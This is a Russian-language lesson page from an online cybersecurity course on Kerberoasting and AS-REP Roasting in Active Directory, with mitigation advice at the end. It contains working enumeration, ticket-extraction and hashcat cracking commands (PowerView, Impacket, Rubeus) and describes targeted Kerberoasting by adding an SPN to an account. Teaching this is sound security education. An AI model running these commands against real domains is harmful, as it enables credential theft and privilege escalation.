0Pricing
Cyber Security Academy · Урок

Kerberoasting и AS-REP Roasting

Запрашивайте сервисные билеты Kerberos и взламывайте их автономно с помощью Hashcat.

«Kerberoasting и AS-REP Roasting» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Шифрование билетов Kerberos

Сервисные билеты зашифрованы хешем пароля учетной записи службы. Любой пользователь домена может запросить сервисный билет для любого SPN. Если у учетной записи службы слабый пароль, билет можно взломать автономно.

Что такое керберостинг

Керберостинг запрашивает сервисные билеты для учетных записей с именами участников-служб (SPN), извлекает зашифрованный билет и взламывает его автономно с помощью Hashcat. Повышенные привилегии не требуются — это может сделать любой пользователь домена.

# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with Hashcat

Поиск SPN

Перечислите все учетные записи служб с SPN с помощью PowerView, Impacket или встроенных инструментов AD. SPN связывают учетные записи служб с их службами.

# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com

# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
  "(servicePrincipalName=*)" cn servicePrincipalName

Запрос и извлечение билетов

Rubeus (Windows) и GetUserSPNs из Impacket (Linux) запрашивают билеты и выводят их в формате, пригодном для взлома.

# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
  -request -outputfile hashes.txt

Взлом с помощью Hashcat

Хеши керберостинга используют режим 13100 (TGS-REP Kerberos 5). Для максимальной эффективности используйте надежный словарь со специальными правилами.

# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule

# AES tickets: mode 19700 (AES128) or 19800 (AES256)

Что такое перебор AS-REP

Атака с перебором AS-REP нацелена на учетные записи, для которых включен параметр Не требовать предварительную аутентификацию Kerberos. AS возвращает TGT, зашифрованный хешем пользователя, — его можно запросить без знания пароля и взломать автономно.

Поиск учетных записей с отключенной предварительной аутентификацией

Учетные записи без предварительной аутентификации — это ошибка конфигурации, часто оставшаяся от устаревших приложений. Перечислите их с помощью PowerView или GetNPUsers.

# PowerView
Get-DomainUser -PreauthNotRequired

# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
  -dc-ip dc.corp.com -format hashcat -outputfile asrep.txt

# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txt

Взлом хешей AS-REP

Хеши AS-REP используют режим Hashcat 18200. Процесс взлома такой же, как при керберостинге, — автономная словарная атака на зашифрованный ответ AS.

# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule

Оценка последствий

Взломанные пароли учетных записей служб часто обеспечивают повышенные привилегии: учетные записи служб, запускающих базы данных, программное обеспечение для резервного копирования или Exchange, могут быть администраторами домена. Учетные записи AS-REP часто упускают из виду и плохо защищают.

Целевой керберостинг

Если у вас есть доступ на запись к объекту, вы можете временно добавить SPN к учетной записи высокой ценности, выполнить для нее керберостинг, взломать хеш, а затем удалить SPN, атакуя конкретные учетные записи по мере необходимости.

Меры защиты

Защита от керберостинга: используйте длинные случайные пароли (от 25 символов) для учетных записей служб или, что лучше, групповые управляемые служебные учетные записи (gMSA) с автоматически меняющимися паролями длиной 120 символов. Для защиты от перебора AS-REP включите предварительную аутентификацию для всех учетных записей.

Быстрая проверка

Какой атрибут учетной записи требуется для проведения перебора AS-REP?

Итоги: керберостинг и перебор AS-REP

Обе атаки используют слабые места шифрования билетов Kerberos, позволяя взламывать пароли автономно и не вызывая блокировку учетных записей. Керберостинг нацелен на учетные записи с SPN (его может выполнить любой пользователь домена), а перебор AS-REP — на учетные записи без предварительной аутентификации (учетные данные не нужны). Для учетных записей служб используйте gMSA, а для всех пользователей включите предварительную аутентификацию.

Часто задаваемые вопросы

Урок «Kerberoasting и AS-REP Roasting» бесплатный?

Да — полный текст урока «Kerberoasting и AS-REP Roasting» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Kerberoasting и AS-REP Roasting»?

Запрашивайте сервисные билеты Kerberos и взламывайте их автономно с помощью Hashcat. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.

Сколько времени занимает урок «Kerberoasting и AS-REP Roasting»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Аутентификация Windows: NTLM и Kerberos
  2. Атаки Pass-the-Hash и Pass-the-Ticket
  3. Kerberoasting и AS-REP Roasting
  4. Защита Active Directory
← Назад к Cyber Security Academy